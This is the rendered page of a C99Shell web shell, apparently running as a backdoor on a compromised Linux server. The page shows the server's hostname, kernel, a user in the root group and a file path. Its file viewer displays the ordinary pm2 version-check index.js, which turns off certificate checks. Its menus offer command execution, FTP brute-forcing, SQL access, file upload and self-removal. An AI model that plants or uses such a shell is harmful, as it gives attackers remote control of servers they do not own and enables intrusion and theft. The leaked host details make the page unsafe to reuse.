!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-163-generic #173-Ubuntu SMP Tue Oct 14 17:51:00 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/.nvm/versions/node/v18.17.1/lib/node_modules/pm2/node_modules/@pm2/pm2-version-check/   drwxr-xr-x
Free 23.66 GB of 117.98 GB (20.05%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     index.js (1.16 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
const https = require('https');
const debug = require('debug')('pm2:version-check')
const qs    = require('querystring')

var VersionCheck = {}

VersionCheck.runCheck = function(params, cb) {
  var path = null

  if (cb == null && typeof(params) == 'function') {
    cb = params
    path = '/check'
  } else {
    path = '/check?' + qs.stringify(params)
  }

  var options = {
    host: 'version.pm2.io',
    path: path,
    strictSSL: false,
    timeout: 1200,
    rejectUnauthorized: false
  }

  var req = https.get(options, function(res) {
    if (res.statusCode != 200) return false
    var bodyChunks = []
    res.on('data', function(chunk) {
      bodyChunks.push(chunk)
    }).on('end', function() {
      var body = Buffer.concat(bodyChunks)
      try {
        var data = JSON.parse(body)
        return cb ? cb(null, data) : null
      } catch(e) {
        return cb ? cb(new Error('Could not parse result')) : null
      }
    })
  })

  req.on('error', function(e) {
    debug('ERROR: ' + e.message)
    return cb ? cb(e) : null
  })
}

module.exports = VersionCheck

if (require.main === module) {
  VersionCheck.runCheck((err, dt) => {
    console.log(err, dt)
  })
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0035 ]--